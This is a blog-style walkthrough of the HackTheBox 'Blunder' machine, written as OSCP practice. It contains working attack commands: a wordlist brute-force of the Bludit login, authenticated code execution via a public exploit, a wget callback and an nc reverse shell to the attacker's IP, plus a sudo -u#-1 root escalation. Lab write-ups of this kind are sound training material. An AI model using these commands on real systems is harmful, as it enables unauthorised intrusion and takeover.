Follow along in my OSCP journey, this is my target 15of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.191
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Ok, so it seems like the path is quite straightforward as there is only 1 service that’s open.
Web — 80
First of all, the website just seems like a blog type template of interesting facts without many features to explore.
Nikto
Nikto is an old web scanner that is always good to run to get some quick info on the target. We get a lot of false positives with the admin page but we find a potential interesting file .gitignore
It’s seems that there are some remains from a git repo, let’s explore
We looked at those folders but nothing of value in the end
Let’s explore with a tool specialised in directory busting, gobuster.
gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/0 (Status: 200) [Size: 7561]
/LICENSE (Status: 200) [Size: 1083]
/about (Status: 200) [Size: 3280]
/admin (Status: 301) [Size: 0]
/cgi-bin/ (Status: 301) [Size: 0]
/install.php (Status: 200) [Size: 30]
/robots.txt (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]
/todo.txt (Status: 200) [Size: 118]
There are a couple on interesting filenames on that list
- todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
- install.php and /admin
First time we actually read the name of the app that is installed and we have a login page as well.
HINT
We’ve explored most of the application what are the logic paths we can with a login screen and the name of an app?
.
.
.
.
It’s time for exploit research and possibly login bypass or login bruteforce.
Based on the page source and the searchexploit research it seems the bludit version is 3.9.2
The authentication followed by the file upload seems like a nice vector, let’s look at our enumeration for a username
We also looked for the credentials direclty based on documentation but we didn’t have access
We also have the user found in the todo notes:
We tried the python bruteforce script but couldn’t fix encoding issues, we tried the ruby option instead
ruby 48746.rb -r http://10.10.10.191/admin/login.php -u fergus -w /usr/share/wordlists/rockyou.txt
But it doesn’t seem to work
HINT
Based on our current research most exploits for bludit require us to be authenticated, what other options than rockyou do we have?
.
.
.
.
That’s right, we know what the owner loves, let’s create a custom wordlist with the topics he enjoys using cewl.
# -d for the depth and -m for the min of characters
cewl -w customwordlist.txt -d 1 -m 7 http://10.10.10.191/0
Let’s run our bruteforce again with the new list:
ruby2.7 48746.rb -r http://10.10.10.191 -u fergus -w customwordlist.txt
Jackpot, let’s authenticate using fergus:RolandDeschain
We’re in!
Now that we’re in, we do realise there isn’t much to explore inside the admin dashboard, let’s pivot to the other exploits, reading the multiple/webapps/48701.txt exploit we realise that we can actually get RCE not only directory traversal. And reading the exploit for version for 3.9.12 (php/webapps/48568.py) we realise we can use it as well.
searchsploit -x multiple/webapps/48701.txt
searchsploit -x php/webapps/48568.py
We try to run it, without much success initially
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "id"
HINT
When not having any outputs on our RCE attempts, what is a nice way to confirm if something is happening on the machine?
.
.
.
.
We want to test for blind execution, a nice way to do so, is trying to perform some action that we can witness from our machine such as web server acces using a classic file web server or ping using tcpdump.
updog -p 80
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "wget http://10.10.14.46/test"
We confirm we have blind RCE ❤
Let’s get a reverse shell
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.46 4444 >/tmp/f"
For some reason the exploit isn’t super reliable, I had to run the same command a couple of times for it to work. We’re in baby!
Time for some shell upgrade 😉 We actually struggled to get a fully functional tty shell but thanks to this article we found a way https://zweilosec.github.io/posts/upgrade-linux-shell/
- In our kali terminal, before creating our listener we actually type ‘bash’
- which python python2 python3 (find out if python2 or python3 is installed
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
3. Ctrl+Z
4. stty raw -echo
5. fg, Enter, Enter
We are the www-data user, so we don’t have a user flag yet, let’s explore the application for some possible password.
We tried cracking the passwords unsuccesfully. Let’s enumerate the users on the machine
We look at /etc/passwd + /home and we have 2 users: hugo and shaun
Let’s explore the usual locations for interesting files that www-data could have permission to /opt/ /var/www
It seems that the version that was mentioned in the todo notes is ready but the apache config files haven’t been updated yet, let’s explore the same users file
Let’s crack the password using crackstation
Let’s login as hugo:
Let’s get the user flag
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
Ok we do get a hit immediately with sudo -l
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
HINT
Does this mean we can just run sudo /bin/bash? Have you seen that !root capability before?
.
.
.
.
It seems we can run /bin/bash as any user but root, let’s do some digging
Let’s open that up
let’s give that a try, we fail as it seems we need a tty shell, let’s get that and try again
sudo -u#-1 /bin/bash
What did I learn?
- How to go through exploits, read them and understand how to use them properly.
- How to create a fully usable TTY shell as the last part of the machine requires it to work.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.